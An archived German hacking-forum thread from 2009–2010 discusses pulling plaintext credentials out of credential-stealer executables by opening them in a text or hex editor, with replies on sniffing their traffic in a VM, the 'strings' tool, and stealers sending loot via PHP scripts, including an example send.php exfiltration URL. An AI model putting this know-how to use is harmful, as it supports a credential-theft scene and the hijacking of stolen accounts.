Archiv verlassen und diese Seite im Standarddesign anzeigen : Sniffen mit .txt Dokument
mainstream
17.08.2009, 13:52
Ihr nehmt einen x beliebigen Stealer und ertsellt einen neuen Txt Dokument,dann zieht ihr es in den txt Dokument rein
http://img5.imagebanana.com/img/sn0j2i5r/thumb/1.jpg (http://img5.imagebanana.com/view/sn0j2i5r/1.jpg)
Dann sollte es so ausschauen
http://img5.imagebanana.com/img/ka4ul49m/thumb/2.jpg (http://img5.imagebanana.com/view/ka4ul49m/2.jpg)
Meistens stehen die Daten ganz am unten,wie auf meinem Bild zu sehen ist.
Wenn Das Programm aber verschlüsselt ist,wird es leider nicht klappen.
Um Sachen 100% sniffen zu können empfehle ich einen Schrott PC zu besorgen und dort zu sniffen,weil so bekommt ihr die Daten ganz sicher,denn dagegen haben die Stealer keinen Schutz :D
Aber auch nur wenn die Daten Plaintext sind.
Und nennst du 2 Zeilen ein Tutorial??
Finde das ja gut ,dass du sowas auch den anderen die das nicht kennen näher bringen willst ,aber hättest dir ein bischen mehr Mühe geben können ;)
Wenn er gut gecryptet ist, sollte es aber dort nicht angezeigt werden.
Außerdem ist's immer empfehlenswert sowas über eine VMWare/virtuellen PC zu machen - somit ist die Gefahr sich selbst zu infizieren gering.
Und ein Tutorial ist meiner Meinung nach ausführlicher und mit mehr Mühe geschrieben - auch wenn man hier eigentlich nicht viel erzählen kann!
mainstream
17.08.2009, 14:12
Habs jetzt ganz ausführlich gemacht,dass sollte jetzt jeder vestehen :confused:
Füge vl auch noch dazu ,dass wenn es verschlüsselt ist es nicht geht.
Und dass manche schlechten Stealer base64 oder ähnliche Verschlüsselungen verwenden.
höhö hatte mal ein programm geschrieben, was stealer usw nach bestimmten strings untersucht und analysiert... muss ich mal richtig zuende proggn^^
Edit:
ach ja schritt pc -> holt euchne VM und macht das da.
stealer haben dagegen keinen schutz ? = falsch!
die meisten stealer versenden ihre daten per php script, dann steht bei dir sowas da:
http://ww.ulki.ftphaha.de/send.php?daten=lkjqdpasdöqmdöamsdöqd
das hilft dir reichlich wenig ^^
viele stealer haben soweit aufgerüstet, dass man sie nicht debuggen/sniffen (mit wireshart oda so) kann...
Gibt so viele Programme mit denen du sniffen kannst und keinen Grund, wieso man etwas nicht sniffen können sollte.. krasser Schutz: If Prozess("wireshark.exe") = True Then End :D"
Ne im ernst, das einzig effektive ist wirklich das Ganze über ein Php Script zu machen ;)
Achja und btw das is kein Tutorial sondern ein Hinweis :P
Gibt so viele Programme mit denen du sniffen kannst und keinen Grund, wieso man etwas nicht sniffen können sollte.. krasser Schutz: If Prozess("wireshark.exe") = True Then End :D"
Ich finde die Methode nicht schlecht :D Sie klappt immer eigentlich ...
@Threadstarter , dann sag doch aber auch das du das "tut" von youtube hast :D du hast es genauso erläutert wie der Typ dort xD
~inmate
novaca!ne
17.08.2009, 15:58
omg, das ist ja wohl das schlechteste tut überhaupt !
nix gegen dich, mainstream ,
aber ich glaube nicht das die leute von f-h hier ein tut brauchen wo gezeigt wird wie man eine datei im notepad öffnet !
mainstream
17.08.2009, 16:30
Ich habe das Tutorial nicht von Youtube:confused:
Ich dachte nur,es würde einigen hier helfen.....
Datei von .exe => .txt ?
Ist genau das gleiche.
Mfg
rtroeger
14.02.2010, 07:47
Also ich finde das "Tutorial" nicht gut. Ich habe sowas auch schonmal mit Erfolg gemacht, allerdings anders: HexEdit oder PSPad und enen Netzwerksniffer benutzt.
Garfield
14.02.2010, 08:35
Stellt doch zumindest das Unix-Tool "strings" vor. Das hat dann zumindest noch etwas Komfort:
"strings -n MINIMALLÄNGE inputfile" -> auf stdout fallen dann alle Strings raus, die mindestens MINIMALLÄNGE haben.
Abgesehen davon, sollte es halbwegs klar sein, dass/wie man in einer Binärdatei nach Strings sucht. Wenn man schon mit so Kram rumspielt...
alter leite, habt ihr nen knall ?
der Thread ist von 17.08.2009!
BlackCobra
14.02.2010, 10:54
LOL Leute guckt mal auf das Datum. XD Lachflash des Tages.
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.